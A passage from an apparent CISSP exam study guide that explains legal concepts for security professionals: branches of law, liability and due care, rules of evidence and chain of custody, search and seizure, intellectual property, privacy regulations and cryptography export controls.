As stated above, common law will be the most represented in the exam, so it will 
be the primary focus here. Within common law there are various branches of laws, 
including criminal, civil, and administrative law. 

Criminal Law 

Criminal law pertains to those laws where the victim can be seen as society itself. 
While it might seem odd to consider society the victim when an individual is mur- 
dered, the goal of criminal law is to promote and maintain an orderly and law abiding 
citizenry. Criminal law can include penalties that remove an individual from society 
by incarceration or, in some extreme cases in some regions, death. The goals of 
criminal law are to deter crime and to punish offenders. 

Due to the seriousness of potentially depriving someone of either their freedom 
or, in the most extreme cases, his or her life, the burden of proof in criminal cases is 
considerable. In order to convict someone accused of a criminal act, the crime must 
be proved beyond any reasonable doubt. Once proven, the punishment for commis- 
sion of a criminal act will potentially include incarceration, financial penalties, or, 
in some jurisdictions, execution as punishment for the most heinous of criminal 
acts. 


Civil Law 

In addition to civil law being a major legal system in the world, it also serves as a type 
of law within the common law legal system. Another term associated with civil law is 
tort law, which deals with injury (loosely defined), resulting from someone violating 
their responsibility to provide a duty of care. Tort law is the primary component of 
civil law, and is the most significant source of lawsuits that seek damages. 

Society is seen as the victim under criminal law; under civil law the victim will be 
an individual, group, organization. While the government prosecutes an individual or 
organization under criminal law, within civil law the concerned parties are most com- 
monly private parties. Another difference between criminal and civil law is the goal 
of each. The focus of criminal law is punishment and deterrence; civil law focuses 
on compensating the victim. 

Note that one act can, and very often does, result in both criminal and civil 
actions. A recent example of someone having both criminal and civil penalties levied 
is in the case of Bernie Madoff, whose elaborate Ponzi scheme swindled investors 
out of billions of dollars. Madoff pleaded guilty in a criminal court to 1 1 felonies 
including securities fraud, wire fraud, perjury, and money laundering. In addition 
to the criminal charges levied by the government, numerous civil suits sought 
compensatory damages for the monies lost by investors in the fraud. 

The most popular example in recent history involves the O.J. Simpson murder 
trial, in which Mr. Simpson was acquitted in a criminal court for the murder of his 
wife Nicole Brown and Ronald Goldman, but later found liable in civil court pro- 
ceedings for causing the wrongful death of Mr. Goldman. 
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Table 2.1 Common Types of Financial Damages 


Financial Damages 

Description 

Statutory 

Statutory damages are those prescribed by law, which can be 
awarded to the victim even if the victim incurred no actual loss 


or injury. 

Compensatory 

The purpose of compensatory damages is to provide the victim 
with a financial award in effort to compensate for the loss or injury 
incurred as a direct result of the wrongdoing. 

Punitive 

The intent of punitive damages is to punish an individual or 
organization. These damages are typically awarded to attempt 
to discourage a particularly egregious violation where the 
compensatory or statutory damages alone would not act as a 
deterrent. 


The difference in outcomes is explained by the difference in the burden of proof 
for civil and criminal law. In the United States, the burden of proof in a criminal 
court is beyond a reasonable doubt, while the burden of proof in civil proceedings 
is the preponderance of the evidence. “Preponderance” means it is more likely than 
not. Satisfying the burden of proof requirement of the preponderance of the evidence 
in a civil matter is a much easier task than meeting the burden of proof requirement 
in criminal proceedings. The most common outcome of a successful ruling against a 
defendant is requiring the payment of financial damages. The most common types of 
financial damages are presented in Table 2.1. 

Administrative Law 

Administrative law or regulatory law is law enacted by government agencies. The 
executive branch (deriving from the Office of the President) enacts administrative 
law in the United States. Government-mandated compliance measures are adminis- 
trative laws. 

The executive branch can create administrative law without requiring input from 
the legislative branch, but the law must still operate within the confines of the civil 
and criminal code, and can still come under scrutiny by the judicial branch. Some 
examples of administrative law are FCC regulations, HIPAA Security mandates, 
FDA regulations, and FAA regulations. 

LIABILITY 

Legal liability is another important legal concept for information security profes- 
sionals and their employers. Society has grown quite litigious over the years, and the 
question of whether an organization is legally liable for specific actions or inactions 
can prove costly. Questions of liability often turn into questions regarding potential 
negligence. When attempting to determine whether certain actions or inactions con- 
stitute negligence, the Prudent Man Rule is often applied. 
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Two important terms to understand are due care and due diligence, which have 
become common standards that are used in determining corporate liability in courts 
of law. 

DUE CARE 

The standard of due care, or a duty of care, provides a framework that helps to 
define a minimum standard of protection that business stakeholders must attempt to 
achieve. Due care discussions often reference the Prudent Man Rule, and require that 
the organization engage in business practices that a prudent, right thinking, person 
would consider to be appropriate. Businesses that are found to have not been apply- 
ing this minimum duty of care can be deemed as having been negligent in carrying 
out their duties. 

The term “best practices” is used to discuss which information security technolo- 
gies to adopt in organizations. Best practices are similar to due care in that they are 
both abstract concepts that must be inferred and are not explicit. Best practices mean 
organizations align themselves with the practices of the best in their industry; due 
care requires that organizations meet the minimum standard of care that prudent 
organizations would apply. As time passes, those practices which might today be 
considered best will tomorrow be thought of as the minimum necessary, which are 
those required by the standard of due care. 

DUE DILIGENCE 

A concept closely related to due care is due diligence. While due care intends to 
set a minimum necessary standard of care to be employed by an organization, due 
diligence requires that an organization continually scrutinize their own practices to 
ensure that they are always meeting or exceeding the requirements for protection of 
assets and stakeholders. Due diligence is the management of due care: it follows a 
formal process. 

Prior to its application in information security, due diligence was already used in 
legal realms. Persons are said to have exercised due diligence, and therefore cannot be 
considered negligent, if they were prudent in their investigation of potential risks and 
threats. In information security there will always be unknown or unexpected threats just 
as there will always be unknown vulnerabilities. If an organization were compromised in 
such a way that caused significant financial harm to their consumers, stockholders, or the 
public, one of the ways in which the organization would defend its actions or inactions is 
by showing that they exercised due diligence in investigating the risk to the organization 
and acted sensibly and prudently in protecting against the risks being manifested. 

LEGAL ASPECTS OF INVESTIGATIONS 

Investigations are a critical way in which information security professionals come 
into contact with the law. Forensic and incident response personnel often conduct 
investigations, and both need to have a basic understanding of legal matters to ensure 
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that the legal merits of the investigation are not unintentionally tarnished. Evidence, 
and the appropriate method for handling evidence, is a critical legal issue that all 
information security professionals must understand. Another issue that touches both 
information security and legal investigations is search and seizure. 

Evidence 

Evidence is one of the most important legal concepts for information security profes- 
sionals to understand. Information security professionals are commonly involved in 
investigations, and often have to obtain or handle evidence during the investigation. 
Some types of evidence carry more weight than others; however, information secu- 
rity professionals should attempt to provide all evidence, regardless of whether that 
evidence proves or disproves the facts of a case. While there are no absolute means to 
ensure that evidence will be allowed and helpful in a court of law, information secu- 
rity professionals should understand the basic rules of evidence. Evidence should be 
relevant, authentic, accurate, complete, and convincing. Evidence gathering should 
emphasize these criteria. 

Real Evidence 

The first, and most basic, category of evidence is that of real evidence. Real evidence 
consists of tangible or physical objects. A knife or bloody glove might constitute real 
evidence in some traditional criminal proceedings. However, with most computer 
incidents, real evidence is commonly made up of physical objects such as hard 
drives, DVDs, USB storage devices, or printed business records. 

Direct Evidence 

Direct evidence is testimony provided by a witness regarding what the witness 
actually experienced with her five senses. The witnesses must have experienced 
what they are testifying to, rather than have gained the knowledge indirectly through 
another person (hearsay, see below). 

Circumstantial Evidence 

Circumstantial evidence is evidence which serves to establish the circumstances 
related to particular points or even other evidence. For instance, circumstantial 
evidence might support claims made regarding other evidence or the accuracy of 
other evidence. Circumstantial evidence provides details regarding circumstances 
that allow for assumptions to be made regarding other types of evidence. This type 
of evidence offers indirect proof, and typically cannot be used as the sole evidence 
in a case. For instance, if a person testified that she directly witnessed the defendant 
create and distribute malware this would constitute direct evidence. If the forensics 
investigation of the defendant’s computer revealed the existence of source code for 
the malware, this would constitute circumstantial evidence. 

Corroborative Evidence 

In order to strengthen a particular fact or element of a case there might be a need for 
corroborative evidence. This type of evidence provides additional support for a fact 
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that might have been called into question. This evidence does not establish a particu- 
lar fact on its own, but rather provides additional support for other facts. 

Hearsay 

Hearsay evidence constitutes second-hand evidence. As opposed to direct evidence, 
which someone has witnessed with her five senses, hearsay evidence involves indi- 
rect information. Hearsay evidence is normally considered inadmissible in court. 
Numerous rules including Rules 803 and 804 of the Federal Rules of Evidence of 
the United States provide for exceptions to the general inadmissibility of hearsay 
evidence that is defined in Rule 802. 

Business and computer generated records are generally considered hearsay evi- 
dence, but case law and updates to the Federal Rules of Evidence have established 
exceptions to the general rule of business records and computer generated data and 
logs being hearsay. The exception defined in Rule 803 provides for the admissibility 
of a record or report that was “made at or near the time by, or from information trans- 
mitted by, a person with knowledge, if kept in the course of a regularly conducted 
business activity, and if it was the regular practice of that business activity to make 
the memorandum, report, record or data compilation. ”[1] 

An additional consideration important to computer investigations pertains to the 
admissibility of binary disk and physical memory images. The Rule of Evidence that 
is interpreted to allow for disk and memory images to be admissible is actually not 
an exception to the hearsay rule, Rule 802, but is rather found in Rule 1001, which 
defines what constitutes originals when dealing with writings, recordings, and photo- 
graphs. Rule 1001 states that “if data are stored in a computer or similar device, any 
printout or other output readable by sight, shown to reflect the data accurately, is an 
‘original’. ”[2] This definition has been interpreted to allow for both forensic reports 
as well as memory and disk images to be considered even though they would not 
constitute the traditional business record exception of Rule 803. 

Best Evidence Rule 

Courts prefer the best evidence possible. Original documents are preferred over 
copies: conclusive tangible objects are preferred over oral testimony. Recall that 
the five desirable criteria for evidence suggest that, where possible, evidence should 
be: relevant, authentic, accurate, complete, and convincing. The best evidence rule 
prefers evidence that meets these criteria. 

Secondary Evidence 

With computer crimes and incidents best evidence might not always be attainable. 
Secondary evidence is a class of evidence common in cases involving computers. 
Secondary evidence consists of copies of original documents and oral descrip- 
tions. Computer-generated logs and documents might also constitute secondary 
rather than best evidence. However, Rule 1001 of the United States Federal Rules 
of Evidence can allow for readable reports of data contained on a computer to be 
considered original as opposed to secondary evidence. 
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Evidence Integrity 

Evidence must be reliable. It is common during forensic and incident response 
investigations to analyze digital media. It is critical to maintain the integrity of the 
data during the course of its acquisition and analysis. Checksums can ensure that 
no data changes occurred as a result of the acquisition and analysis. One-way hash 
functions such as MD5 or SHA- 1 are commonly used for this purpose. The hashing 
algorithm processes the entire disk or image (every single bit), and a resultant hash 
checksum is the output. After analysis is completed the entire disk can again be 
hashed. If even one bit of the disk or image has changed then the resultant hash 
checksum will differ from the one that was originally obtained. 

Chain of Custody 

In addition to the use of integrity hashing algorithms and checksums, another means 
to help express the reliability of evidence is by maintaining chain of custody docu- 
mentation. Chain of custody requires that once evidence is acquired, full documenta- 
tion be maintained regarding the who, what, when and where related to the handling 
of said evidence. Initials and/or signatures on the chain of custody form indicate that 
the signers attest to the accuracy of the information concerning their role noted on 
the chain of custody form. 

The goal is to show that throughout the evidence lifecycle it is both known and 
documented how the evidence was handled. This also supports evidence integrity: no 
reasonable potential exists for another party to have altered the evidence. Figure 2.6 
shows an evidence bag, which may be used to document the chain of custody for 
small items, such as disk drives. 

While neither integrity checksums nor a chain of custody form is required in 
order for evidence to be admissible in a court of law, they both support the reliability 
of digital evidence. Use of integrity checksums and chain of custody by forensics 
investigators is best practice. An example chain of custody form can be seen in 
Figure 2.7. 

Reasonable Searches 

The Fourth Amendment to the United States Constitution protects citizens from 
unreasonable search and seizure by the government. In all cases involving seized 
evidence, if a court determines the evidence was obtained illegally then it will be 
inadmissible in court. In most circumstances in order for law enforcement to search a 
private citizen’s property both probable cause and a search warrant issued by a judge 
are required. The search warrant will specify the area that will be searched and what 
law enforcement is searching for. 

There are circumstances that do not require a search warrant, such as if the 
property is in plain sight or at public checkpoints. One important exception to the 
requirement for a search warrant in computer crimes is that of exigent circumstances. 
Exigent circumstances are those in which there is an immediate threat to human 
life or of evidence being destroyed. A court of law will later decide whether the 
circumstances were such that seizure without a warrant was indeed justified. 
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Search warrants only apply to law enforcement and those who are acting under 
the color of law enforcement. If private citizens carry out actions or investigations or 
on behalf of law enforcement, then these individuals are acting under the color of law 
and can be considered as agents of law enforcement. An example of acting under the 
color of law would be when law enforcement becomes involved in a corporate case 
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and corporate security professionals are seizing data under direct supervision of law 
enforcement. If a person is acting under the color of law, then they must be cognizant 
of the Fourth Amendment rights related to unreasonable searches and seizures. A 
person acting under the color of law who deprives someone of his or her constitution- 
ally protected rights can be found guilty of having committed a crime under Title 18. 
U. S. C. Section 242 — Deprivation of Rights Under Color of Law. 

A search warrant is not required if law enforcement is not involved in the case. 
However, organizations should exercise care in ensuring that employees are made 
aware in advance that their actions are monitored, and that their equipment, and 
perhaps even personal belongings, are subject to search. Certainly, these notifications 
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should only be made if the organization's security policy warrants them. Further, cor- 
porate policy regarding search and seizure must take into account the various privacy 
laws in the applicable jurisdiction. 


NOTE 

Due to the particular issues unique to investigations being carried out by, or on behalf of, law 
enforcement, an organization will need to make an informed decision about whether, or when, law 
enforcement will be brought in to assist with investigations. 


Entrapment and Enticement 

Another topic closely related to the involvement of law enforcement in the investiga- 
tive process deals with the concepts of entrapment and enticement. Entrapment is 
when law enforcement, or an agent of law enforcement, persuades someone to com- 
mit a crime when the person otherwise had no intention to commit a crime. Entrap- 
ment can serve as a legal defense in a court of law, and, therefore, should be avoided 
if prosecution is a goal. A closely related concept is enticement. Enticement could 
still involve agents of law enforcement making the conditions for commission of a 
crime favorable, but the difference is that the person is determined to have already 
broken a law or is intent on doing so. The question as to whether the actions of law 
enforcement will constitute enticement or entrapment is ultimately up to a jury. Care 
should be taken to distinguish between these two terms. 


Computer Crime 

One aspect of the interaction of information security and the legal system is that 
of computer crimes. Applicable computer crime laws vary throughout the world, 
according to jurisdiction. However, regardless of region, some generalities exist. 
Computer crimes can be understood as belonging loosely to three different categories 
based upon the way in which computer systems relate to the wrongdoing: computer 
systems as targets; computer systems as a tool to perpetrate the crime; or computer 
systems involved but incidental. The last category occurs commonly because 
computer systems are such an indispensable component of modern life. The other 
two categories are more significant: 

• Computer systems as target — Crimes where the computer systems serve as a 
primary target, such as: disrupting online commerce by means of Distributed 
Denial of Service attacks, installing malware on systems for the distribution of 
spam, or exploiting vulnerability on a system to leverage it to store illegal content. 

• Computer as a tool — Crimes where the computer is a central component 
enabling the commission of the crime. Examples include: stealing trade secrets 
by compromising a database server, leveraging computers to steal cardholder 
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data from payment systems, conducting computer based reconnaissance to 
target an individual for information disclosure or espionage, and using computer 
systems for the purposes of harassment. 

As information systems have evolved, and as our businesses now leverage 
computer systems to a larger extent, traditional crimes such as theft and fraud are 
being perpetrated both by using and targeting computers. One of the most difficult 
aspects of prosecution of computer crimes is attribution. Meeting the burden of proof 
requirement in criminal proceedings, beyond a reasonable doubt, can be difficult 
given an attacker can often spoof the source of the crime or can leverage different 
systems under someone else’s control. 

INTELLECTUAL PROPERTY 

As opposed to physical or tangible property, intellectual property refers to intangible 
property that resulted from a creative act. The purpose of intellectual property law is 
to control the use of intangible property that can often be trivial to reproduce or abuse 
once made public or known. The following intellectual property concepts effectively 
create an exclusive monopoly on their use. 

Trademark 

Trademarks are associated with marketing: the purpose is to allow for the creation 
of a brand that distinguishes the source of products or services. A distinguishing 
name, logo, symbol, or image represents the most commonly trademarked items. 
In the United States two different symbols are used with distinctive marks that an 
individual or organization is intending to protect. The superscript TM symbol can be 
used freely to indicate an unregistered mark, and is shown in Figure 2.8. 

The circle R symbol is used with marks that have been formally registered as a 
trademark with the U.S. Patent and Trademark Office, and is shown in Figure 2.9. 
In addition to the registered and unregistered version of a trademark, servicemarks 
constitute a subset of brand recognition related intellectual property. As suggested by 
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the name, a servicemark is used to brand a service offering rather than a particular 
product or company, and looks similar to the unregistered trademark, being denoted 
by a superscript SM symbol. 


Patent 

Patents provide a monopoly to the patent holder on the right to use, make, or sell an 
invention for a period of time in exchange for the patent holder’s making the inven- 
tion public. During the life of the patent, the patent holder can, through the use of 
civil litigation, exclude others from leveraging the patented invention. Obviously, in 
order for an invention to be patented, it should be novel and unique. The length that a 
patent is valid (the patent term) varies throughout the world, and also by the type of 
invention being patented. Generally, in both Europe and the United States the patent 
term is 20 years from the initial filing date. Upon expiration of a patent the invention 
is publicly available for production. 


LEARN BY EXAMPLE 

Velcro 

A quick example that illustrates patents and patent terms as well as trademarks is found in Velcro. 
Velcro, which is a particular brand of small fabric based hook and loop fastener, was invented in 
Switzerland in 1941 by George de Mestral. Expecting many commercial applications of his fabric 
hook and loop fastener, de Mestral applied for patents in numerous countries throughout the 1950s. 
In addition to seeking patents for his invention, de Mestral also trademarked the name Velcro in 
many countries. In 1978 the patent term for de Mestral’ s invention expired, and small fabric-based 
hook and loop fasteners began being mass-produced cheaply by numerous companies. Though the 
patent expired, trademarks do not have an explicit expiration date, so use of the term Velcro on a 
product is still reserved for use by the company de Mestral started. 


Copyright 

Copyright represents a type of intellectual property that protects the form of expres- 
sion in artistic, musical, or literary works, and is typically denoted by the circle c 
symbol as shown in Figure 2.10. The purpose of copyright is to preclude unauthor- 
ized duplication, distribution, or modification of a creative work. Note that the form 
of expression is protected rather than the subject matter or ideas represented. The 
creator or author of a work is, by default, the copyright holder at the time of creation, 
and has exclusive rights regarding the distribution of the copyrighted material. Even 
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though there is an implied copyright granted to the author at the time of creation, 
a more explicit means of copyright exists. A registered copyright is one in which 
the creator has taken the trouble to file the copyright with the Copyright Office, in 
the United States, and provides a more formal means of copyright than that of the 
implied copyright of the author. 

Copyrights, like patents, have a specific term for which they are valid. Also like 
patents, this term can vary based on the type of work as well as the country in which 
the work is published. Once the copyright term has expired, then the work becomes 
part of the public domain. Currently, in the United States, a work typically has an 
enforceable copyright for 70 years after the death of the author. However, if the work 
is a product of a corporation then the term lasts for 95 years after the first publication 
or 120 years after creation, whichever comes first. [3 1 Though there are exceptions to 
this general rule, most European countries also subscribe to the copyright term last- 
ing for life of the author plus an additional 70 years. 


LEARN BY EXAMPLE 

Copyright Term 

One point of serious contention between Europe and the United States is the former’s lack of 
longer corporate copyrights. Whereas in the United States, a product of corporate production might 
have an additional 25-50 years of copyright protection, currently Europe has no such additional 
protections. This issue became prominent in 2009 as the European copyright for a cartoon icon, 
Popeye, expired. In Europe, Popeye is now part of the public domain as it has been 70 years since 
Popeye’s creator, Elzie Segar, died in 1938. 


Though there have been successful attempts to bring better harmony to global 
copyright law, especially within the United States and Europe, serious inconsisten- 
cies still exist throughout the world. Many nations do not even acknowledge copy- 
rights or their legal protection. This lack of acknowledgment further exacerbates the 
issue of global piracy. 


NOTE 

In the United States, as some extremely high value copyrights have been close to becoming part 
of the public domain there have been extensions to the copyright term. Copyright terms have 
consistently been lengthened as individuals and corporations have voiced concerns over financial 
losses resulting from works becoming part of the public domain. 

The Copyright Term Extension Act, which was passed in 1998, extended the copyright term by 
20 years. At the time, the copyright term was the author’s life plus 50 years, or 75 years for corporate 
works, but the extension increased the copyright term to life plus 70 years and 95 years, respectively. 
There are some, notably Lawrence Lessig, who derisively refer to the Copyright Term Extension 
Act as the Mickey Mouse Protection Act given the Act’s proximity to Mickey Mouse’s originally 
scheduled entry into the public domain. 
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Software is typically covered by copyright as if it were a literary work. Recall 
that copyright is intended to cover the form of expression rather than the ideas 
or subject matter. Software licensing fills some of this gap regarding intellectual 
property protections of software. Another software copyright issue is the concept of 
work for hire. Although the creator of the work is the implied copyright holder, care 
should be taken to distinguish whether the software developers or their employers 
are considered the copyright holders. In most instances, when a developer is working 
on creating a code for a specific organization, the organization itself is the copyright 
holder rather than the individual developer, as the code is being developed specifically 
as part of their employment. 

Copyright limitations 

Two important limitations on the exclusivity of the copyright holder’s monopoly 
exist: the doctrines of first sale and fair use. The first sale doctrine allows a legitimate 
purchaser of copyrighted material to sell it to another person. If the purchasers of a 
CD later decide that they no longer cared to own the CD, the first sale doctrine gives 
them the legal right to sell the copyrighted material even though they are not the 
copyright holders. 

Fair use is another limitation on the copyright holder’s exclusive intellectual 
property monopoly. The fair use doctrine allows someone to duplicate copyrighted 
material without requiring the payment, consent, or even knowledge of the copyright 
holder. There are no explicit requirements that must be met to ensure that a particular 
usage constitutes fair use, but there are established guidelines that a judge would use 
in determining whether or not the copyright holder’s legal rights had been infringed 
upon. The four factors defined in the Copyright Act of 1976 as criteria to determine 
whether a use would be covered by the fair use doctrine are: the purpose and style 
of the excerpt; the nature of the copyrighted work; the amount of content duplicated 
compared to the overall length of the work; and whether the duplication might reduce 
the value or desirability of the original work. [4] 

Licenses 

Software licenses are a contract between a provider of software and the consumer. 
Though there are licenses that provide explicit permission for the consumer to do 
virtually anything with the software, including modifying it for use in another com- 
mercial product, most commercial software licensing provides explicit limits on 
the use and distribution of the software. Software licenses such as end-user license 
agreements (EULAs) are an unusual form of contract because using the software 
typically constitutes contractual agreement, even though a small minority of users 
read the lengthy EULA. 

Trade Secrets 

The final form of intellectual property that will be discussed is the concept of trade 
secrets. Trade secrets are business-proprietary information that is important to an 
organization’s ability to compete. The easiest to understand trade secrets are of the 
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“special sauce” variety. Kentucky Fried Chicken could suffer catastrophic losses if 
another fried chicken shop were able to crack Colonel Sanders’ secret blend of 1 1 
herbs and spices that result in the “finger licking goodness” we have all grown to 
know and love. Although the “special sauces” are very obviously trade secrets, any 
business information that provides a competitive edge, and is actively protected by 
the organization can constitute a trade secret. The organization must exercise due 
care and due diligence in the protection of their trade secrets. Some of the most 
common protection methods used are non-compete and non-disclosure agreements 
(NDA). These methods require that employees or other persons privy to business 
confidential information respect the organization’s intellectual property by not work- 
ing for an organization’s competitor or disclosing this information in an unauthorized 
manner. Lack of reasonable protection of trade secrets can make them cease to be 
trade secrets. If the organization does not take reasonable steps to ensure that the 
information remains confidential, then it is reasonable to assume that the organization 
must not derive a competitive advantage from the secrecy of this information. 

Intellectual Property Attacks 

Though attacks upon intellectual property have existed since at least the first 
profit driven intellectual creation, the sophistication and volume of attacks has 
only increased with the growth of portable electronic media and Internet-based 
commerce. Well-known intellectual property attacks are software piracy and 
copyright infringement associated with music and movies. Both have grown easier 
with increased Internet connectivity and growth of piracy enabling sites, such as The 
Pirate Bay, and protocols such as BitTorrent. Other common intellectual property 
attacks include attacks against trade secrets and trademarks. Trade secrets can be 
targeted in corporate espionage schemes and also are prone to be targeted by malicious 
insiders. Because of the potentially high value of the targeted trade secrets, this type 
of intellectual property can draw highly motivated and sophisticated attackers. 

Trademarks can fall under several different types of attacks including: 
counterfeiting, dilution, as well as cybersquatting and typosquatting. Counterfeiting 
involves attempting to pass off a product as if it were the original branded product. 
Counterfeiters try to capitalize on the value associated with a brand. Trademark 
dilution typically represents an unintentional attack in which the trademarked brand 
name is used to refer to the larger general class of products of which the brand is a 
specific instance. For example: the word Kleenex is commonly used in some parts 
of the United States to refer to any facial tissue, regardless of brand, rather than the 
particular brand named version itself; this is an example of trademark dilution. 

Two more recent trademark attacks have developed out of the Internet-based 
economy: cyber- and typosquatting. Cybersquatting refers to an individual or 
organization registering or using, in bad faith, a domain name that is associated with 
another person’s trademark. People will often assume that the trademark owner and 
the domain owner are the same. This can allow the domain owner to infringe upon the 
actual trademark owner’s rights. The primary motivation of cybersquatters is money: 
they typically intend to capitalize on traffic to the domain by people assuming they 


CHAPTER 2 Doma in 1: Security and Risk Management 


are visiting the trademark owner’s Web site. Typosquatting refers to a specific type of 
cybersquatting in which the cybersquatter registers likely misspellings or mistyping 
of legitimate domain trademarks. 

PRIVACY 

Privacy is the protection of the confidentiality of personal information. Many orga- 
nizations host personal information about their users: PII (Personally Identifiable 
Information) such as social security numbers, financial information such as annual 
salary and bank account information required for payroll deposits, and healthcare 
information for insurance purposes. The confidentiality of this information must be 
assured. 

One of the unfortunate side effects of the explosion of information systems over 
the past few decades is the loss of privacy. As more and more data about individuals 
is used and stored by information systems, the likelihood of that data being either 
inadvertently disclosed, sold to a third party, or intentionally compromised by a mali- 
cious insider or third party increases. Further, with breaches of financial and health 
records being publicly disclosed, routinely numbering in the millions to tens of mil- 
lions of records compromised, the erosion of privacy of some of the most sensitive 
data is now commonplace. Previously, stealing millions of financial records could 
have meant physically walking out with enough paper records to fill a tractor trailer; 
now all of this data can fit onto a thumbnail- sized flash memory device. 

Privacy laws related to information systems have cropped up throughout the 
world to provide citizens either greater control or security of their confidential data. 
While there are numerous different international privacy laws, one issue to under- 
stand is whether the citizen’s privacy protections are primarily opt-in or opt-out: does 
the citizen have to choose to do something to gain the benefit of the privacy law or 
is it chosen for them by default? For example: a company gathering personal data 
clearly states that the data can be sold to third party companies. Even though they 
clearly state this fact, albeit in fine print, the organization might require the individual 
to check a box to disallow their data being sold. This is an opt-out agreement because 
the individual had to do something in order to prevent their data from being resold. 
Privacy advocates typically prefer opt-in agreements where the individual would 
have to do something in order to have their data used in this fashion. 

European Union Privacy 

The European Union has taken an aggressive pro-privacy stance, while balancing the 
needs of business. Commerce would be impacted if member nations had different 
regulations regarding the collection and use of personally identifiable information. 
The EU Data Protection Directive allows for the free flow of information while still 
maintaining consistent protections of each member nation’s citizens’ data. The prin- 
ciples of the EU Data Protection Directive are: 

• Notifying individuals how their personal data is collected and used 

• Allowing individuals to opt out of sharing their personal data with third parties 
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• Requiring individuals to opt into sharing the most sensitive personal data 

• Providing reasonable protections for personal data 


OECD Privacy Guidelines 

The Organization for Economic Cooperation and Development (OECD), though 
often considered exclusively European, consists of 30 member nations from around 
the world. The members, in addition to prominent European countries, include such 
countries as the United States, Mexico, Australia, Japan, and the Czech Republic. 
The OECD provides a forum in which countries can focus on issues that impact 
the global economy. The OECD will routinely issue consensus recommendations 
that can serve as an impetus to change current policy and legislation in the OECD 
member countries and beyond. 

An example of such guidance is found in the OECD Guidelines on the Protection 
of Privacy and Transborder Flows of Personal Data, which was issued in 1980. 
Global commerce requires that a citizen’s personal data flow between companies 
based in divergent regions. The OECD privacy guidance sought to provide a basic 
framework for the protections that should be afforded this personal data as it traverses 
the various world economies. The eight driving principles regarding the privacy of 
personal data are as follows: 

• Collection Limitation Principle — personal data collection should have limits, 
be obtained in a lawful manner, and, unless there is a compelling reason to the 
contrary, with the individual’s knowledge and approval. 

• Data Quality Principle — personal data should be complete, accurate, and 
maintained in a fashion consistent with the purposes for the data collection. 

• Purpose Specification Principle — the purpose for the data collection should be 
known, and the subsequent use of the data should be limited to the purposes 
outlined at the time of collection. 

• Use Limitation Principle — personal data should never be disclosed without 
either the consent of the individual or as the result of a legal requirement. 

• Security Safeguards Principle — personal data should be reasonably protected 
against unauthorized use, disclosure, or alteration. 

• Openness Principle — the general policy concerning collection and use of 
personal data should be readily available. 

• Individual Participation Principle — individuals should be: 

• Able to find out if an entity holds any of their personal data 

• Made aware of any personal data being held 

• Given a reason for any denials to account for personal data being held, and a 
process for challenging any denials 

• Able to challenge the content of any personal data being held, and have 
a process for updating their personal data if found to be inaccurate or 
incomplete 

• Accountability Principle — the entity using the personal data should be 
accountable for adhering to the principles above. [5] 
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EU-US Safe Harbor 

An interesting aspect of the EU Data Protection Directive is that the personal data of 
EU citizens may not be transmitted, even when permitted by the individual, to countries 
outside of the EU unless the receiving country is perceived by the EU to adequately 
protect their data. This presents a challenge regarding the sharing of the data with 
the United States, which is perceived to have less stringent privacy protections. To 
help resolve this issue, the United States and European Union created the safe harbor 
framework that will give US based organizations the benefit of authorized data sharing. 
In order to be part of the safe harbor, US organizations must voluntarily consent to 
data privacy principles that are consistent with the EU Data Protection Directive. 

US Privacy Act of 1974 

All governments have a wealth of personally identifiable information on their citizens. 
The Privacy Act of 1974 was created to codify protection of US citizens’ data that is 
being used by the federal government. The Privacy Act defined guidelines regarding 
how US citizens’ personally identifiable information would be used, collected, and 
distributed. An additional protection was that the Privacy Act provides individuals 
with access to the data being maintained related to them, with some national security 
oriented exceptions. 


INTERNATIONAL COOPERATION 

Beyond attribution, attacks bounced off multiple systems present an additional 
jurisdiction challenge: searching or seizing assets. Some involved systems might be 
in countries where the computer crime laws differ from the country prosecuting the 
crime. Or the country where evidence exists might not want to share the information 
with the country prosecuting the crime. These challenges can make successful 
prosecution of computer crimes very difficult. 

To date, the most significant progress toward international cooperation in computer 
crime policy is the Council of Europe Convention on Cybercrime. In addition to the 
treaty being signed and subsequently ratified by a majority of the 47 European member 
countries, the United States has also signed and ratified the treaty. The primary focus of 
the Convention on Cybercrime is establishing standards in cybercrime policy to promote 
international cooperation during the investigation and prosecution of cybercrime. 
Additional information on the Council of Europe Convention on Cybercrime can be 
found here: http://conventions.coe. int/Treaty/en/Treaties/Html/1 85.htm. 


IMPORT/EXPORT RESTRICTIONS 

In the United States, law enforcement can, in some cases, be granted the legal right to 
perform wiretaps to monitor phone conversations. We will discuss legal searches and 
search warrants in the Reasonable Searches section of Legal Aspects of Investigations 
below. What if a would-be terrorist used an encrypted tunnel to carry Voice over IP 
calls rather than using traditional telephony? Even though law enforcement might 
have been granted the legal right to monitor this conversation, their attempts would 
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be stymied by the encryption. Due to the successes of cryptography, many nations 
have limited the import and/or export of cryptosystems and associated cryptographic 
hardware. In some cases, countries would prefer their citizens to not have access to 
cryptosystems that their intelligence agencies cannot crack, and therefore attempt to 
impose import restrictions on cryptographic technologies. 

In addition to import controls, some countries enact bans on the export of 
cryptographic technology to specific countries in an attempt to prevent unfriendly 
nations from having advanced encryption capabilities. Effectively, cryptography is 
treated as if it was a more traditional weapon, and nations desire to limit the spread 
of these arms. During the Cold War, CoCom, the Coordinating Committee for 
Multilateral Export Controls, was a multinational agreement to not export certain 
technologies, which included encryption, to many communist countries. After the 
Cold War, the Wassenaar Arrangement became the standard for export controls. This 
multinational agreement was far less restrictive than the former CoCom, but did 
still suggest significant restrictions on the export of cryptographic algorithms and 
technologies to countries not included in the Wassenaar Arrangement. 

During the 1990s the United States was one of the primary instigators of banning 
the export of cryptographic technologies. The previous United States export restric- 
tions have been greatly relaxed, though there are still countries to which it would be 
illegal to distribute cryptographic technologies. The countries to which the United 
States bars export of encryption technology changes over time, but typically includes 
countries considered to pose a significant threat to US interests. The United States is 
not alone in restricting the export to specific countries considered politically unfriendly 
to their interests. Further information on laws surrounding cryptography can be found 
in the Cryptography Laws section of Chapter 4, Domain 3: Security Engineering. 


TRANS-BORDER DATA FLOW 

The concept of trans-border data flow was discussed tangentially with respect to 
privacy (see Privacy: OECD Privacy Guidelines above). While the OECD Guide- 
lines on the Protection of Privacy and Transborder Flows of Personal Data was 
issued in 1980, the need for considering the impact of data being transferred between 
countries has greatly increased in years since. In general, the OECD recommends 
the unfettered flow of information, albeit with notable legitimate exceptions to the 
free information flow. The most important exceptions to unfettered data transfer 
were identified in the Privacy and Transborder Flows of Personal Data. Five years 
after the privacy guidance, the OECD issued their Declaration on Transborder 
Data Flows, which further supported efforts to support unimpeded data flows. 


IMPORTANT LAWS AND REGULATIONS 

An entire book could easily be filled with discussions of both US and international 
